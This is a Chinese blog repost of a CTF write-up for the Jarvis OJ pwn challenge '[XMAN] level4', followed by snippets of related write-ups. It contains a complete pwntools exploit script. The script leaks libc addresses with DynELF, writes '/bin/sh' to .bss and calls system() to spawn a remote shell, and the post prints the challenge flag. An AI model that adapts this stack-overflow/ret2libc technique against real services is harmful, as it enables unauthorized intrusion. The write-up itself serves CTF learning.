XMAN-level4

最新推荐文章于 2024-07-23 14:36:35 发布
最新推荐文章于 2024-07-23 14:36:35 发布
阅读量147 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/L1B0/p/8393967.html
版权

[XMAN] level4

首先checksec,信息如下

[*] '/root/Desktop/bin/pwn/xman-level4/level4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

没开栈保护,于是考虑栈溢出。

刚做完stack(ret2libc),看到这题直接就想到泄露libc版本,一开始尝试和stack一样的做法,即泄露read和write函数的地址从而找到远程libc的版本,但是试了一发发现找不到libc版本。。。

然后就用DynELF,得到system的真实地址。用read函数将'/bin/sh\x00'写入bss段,然后通过三次pop调用system函数,参数使用bss地址,即system('/bin/sh')。

exp如下

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"

from pwn import *
#context.log_level = "debug"

#io = process('./level4')
io = remote('pwn2.jarvisoj.com', 9880)
elf = ELF('./level4')
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')

#get_system_addr
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

def leak(address):

    payload = flat(['a'*0x88+'f**k', write_plt, main_addr, 1, address, 4])
    io.sendline(payload)
    data = io.recv(4)
    return data

dynelf = DynELF(leak, elf=ELF('./level4'))
sys_addr = dynelf.lookup('system', 'libc')
print 'system_addr:', hex(sys_addr)

#get_the_shell
bss_addr = 0x0804A024
read_plt = elf.plt['read']
#ROPgadget --binary level4  --only "pop|ret"
ppp_addr = 0x08048509

payload = flat(['a'*0x88+'f**k', read_plt, ppp_addr, 0, bss_addr, 8, sys_addr, 0xdeadbeef, bss_addr ])
io.sendline(payload)
io.sendline('/bin/sh\x00')

io.interactive()
#flag:CTF{882130cf51d65fb705440b218e94e98e}


作者: LB919

出处:http://www.cnblogs.com/L1B0/

如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/L1B0/p/8393967.html

weixin_30847271
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1142
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 414
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
xman level4//一步一步rop level2 writeup
u014281987的博客
08-29 862
这道题在没libc的情况下考泄露地址,两个方法,一个read之后直接pop三个栈参数再返回system,另一个重新返回vulnerable,只不过read(8字节),所以是send,不是sendline啊 另外一个大坑点在dynelf的使用,只能通过它泄漏偏移,然后用不带它的再写一遍,原理据师傅说是“DynELF是先算出bin的基地址,然后把符号表翻一遍,接着就知道libc的基地址了,然后把li
18.9.20 Jarvis OJ PWN----[XMAN]level4
qq_42192672的博客
09-20 469
checksec之后,发现可以栈溢出 找可以溢出的地方 我们可以读取无穷无尽的数 但是在IDA中没找到system函数,同时题目也没有给我们lib文件,咋办………… 根据大佬的资料,了解到了pwntools的一个函数DynELF,DynELF函数可以leak system的真实地址,当然最后我们还是要用rop代码重新还原回去执行的 先看一下DynELF怎么用,基本流程如下 d ...
[Jarvis OJ - PWN]——[XMAN]level4
Y_peak的博客
02-16 210
[Jarvis OJ - PWN]——[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x100 - 0x88 = 120, 多余的空间足够我们进行栈溢出利用 但是我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 e
xman-service-auth
05-28
syncdb xman-addadmin xman-generatekeys xman-createdb xman-gmailtokengenerator用法建立资料库在项目目录内的命令行中键入xman-createdb 数据库同步在项目目录内的命令行中输入xman-syncdb 将新用户添加到数据库...
xman-frontend
05-29
Xman 前端 运行项目 克隆项目 运行npm install或yarn 运行npm start或yarn start 与后端集成 前端通过 REST API 连接到后端的不同服务。 服务的文档链接如下 如果您需要访问用户的访问令牌,您可以通过 import ...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
Unicode-XMan.rar_beta
09-24
**Unicode-XMan.rar_beta** 是一个压缩包,包含 **Unicode XMan Version 1.0 Beta (20090910)** 的资源,主要用于查看和理解Unicode字符。这个工具是一个早期的测试版本,发布于2009年9月10日,旨在帮助用户探索...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
bjdctf_2020_babyrop2(cannary格式化字符泄露)
weixin_61283545的博客
06-11 302
这道题的调试属实有问题。从这道题学到可以利用格式化字符串泄露canary 从调试泄露栈上地址可以很清晰看到bp上8位canary,在偏移为6时发现我们标记的6161aa,它的下8位就是canary。打映出来后接受canary时我们先用recvuntil(“0x”),int(p.recv(16),16)来接受。还有一点cannary在bp前8位值得注意...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1438
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
XMAN选拔赛官方Writeup
zsj2102的专栏
07-20 2万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
rois welpwn -xman
u014281987的博客
08-28 822
echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1269
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
随机数种子的作用
最新发布
帆的博客
07-23 1140
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
Java-Lambda
lizhiwei21的博客
07-21 502
lambda表达式可以理解为对匿名内部类的一种简化 , 但是本质是有区别的面向对象思想 :强调的是用对象去完成某些功能函数式编程思想 :强调的是结果 , 而不是怎么去做。
使用9种方法隐藏和显示元素
lulei5153的博客
07-21 207
【代码】使用9种方法隐藏和显示元素。
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值